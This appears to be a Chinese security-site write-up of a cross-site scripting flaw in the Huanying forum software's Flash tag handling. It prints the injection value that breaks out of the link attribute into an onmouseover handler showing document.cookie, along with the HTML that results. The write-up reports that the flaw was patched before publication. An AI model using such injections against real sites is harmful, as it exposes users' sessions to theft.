上一篇:辨别Microsoft安全性邮件的真假 >>
幻影论坛跨站脚本漏洞
幻影的论坛整体的安全性自然没得说啦,如果要挖据出一个注入之类的漏洞,我连想都不敢想啊。。
(mix插嘴一句:我还没教你,你也不会阿,晚上回家求我吧!!)
好了。。具体说一下找这个跨站的思路和方法了。。
首先,幻影是屏蔽了所有的html标签的(废话)
其次,幻影是考虑了绝大部分的跨站方法的(还是废话)
然后,我想,用flash跨跨看看,结果呢,发现flash是被处理成<a href="http://xxxxxxxxxxx">_blank>http://xxxxxxxxxxx</a>的格式了。。
但是这里的处理方式和标准的url的ubb标签处理有了一些不同。。这里只考虑了吧以前显示成为flash改成连接的模式,而没有再考虑对连接的模式,按照以前对url字段应该做的过滤做过滤。。因此呢。。给我们留了一个制造跨站的机会。。
只要发flash的时候,url写成 #" onmouseover="alert(document.cookie) 就可以跨站了。。
emm跟我说,你应该尝试在a标记里边加入img标签,这样onmouseover的可能性会更大。。于是我们继续研究:
首先 随便找一个图片_60_4.gif前边加上" target=_blank>/uploadfiles/newsphoto/468_60_4.gif前边加上 #" onmouseover="alert(document.cookie)"
也就是 #" onmouseover="alert(document.cookie)" _60_4.gif" target=_blank>/uploadfiles/newsphoto/468_60_4.gif
转化成的html代码如下:
<a href="http://www.#" onmouseover="alert(document.cookie)" <img src="/uploadfiles/newsphoto/468_60_4.gif" border="0" alt="" onload="java script:if(this.width>screen.width-333)this.width=screen.width-333">" target="_blank">#" onmouseover="alert(document.cookie)" <img src="/uploadfiles/newsphoto/468_60_4.gif" border="0" alt="" onload="java script:if(this.width>screen.width-333)this.width=screen.width-333"></a>
注:发布前emm已修改掉这个漏洞了。。。
()
下一篇:从IIS到SQL Server数据库安全 >>
相关文章:
- · 木马启动方式揭秘
- · 谈谈IP和MAC捆绑的破解之道
- · 如何配置Win XP SP2的防火墙功能
- · Win XP网络及文件安全技巧总结
- · 删除MSSQL危险存储过程的代码
- · 硬盘分区方案大放送
- · 限制 SQL Server指定主机连接
- · SQL Server 提升权限相关命令及防范
- · Windows中提高内存效能的方法
- · Firefox的32个插件介绍
- · Linux与windows文件互传技巧
- · 配置一款漂亮的Win XP系统
- · 突破局域网对上网用户的一些限制
- · 揭露Windows中各种不老实的服务
- · 巧用TT浏览器解除下载限制
- · 防范间谍软件入侵的三个防护措施
- · 修改Windows组策略让系统更强壮
- · 加快mozilla-firefox的启动速度
- · CPU百科全书:完全指标篇
- · Linux系统中完美装载Windows分区
- · 常见硬件不兼容的典型故障解决方案
- · SQL查询语句精华使用简要
- · 与"入侵者"交手:认识XP下的NetBEUI
- · DIY超频经典教程(基础)
- · CACA基础教程
- · 超级P2P搜索引擎让所有收费网站破产
- · 轻轻松松破解还原卡
- · VPN技术详解
- · 微软ping程序源代码完整版
- · 在xp和2003下察看端口对应的进程
- · 关于BBSxp/LeadBBS的后台上传Webshell的鸡肋防范
- · 某运营商受DDOS攻击的应急响应内部文档
- · 利用FTP,实现Linux与windows文件互传
- · ADSL断流/断线问题集中分析
- · Win XP系统中网桥的配置方法
- · 网络基础:带你彻底认识路由器
- · 如何用FTP自动传送文件
- · 用Java获得IP地址
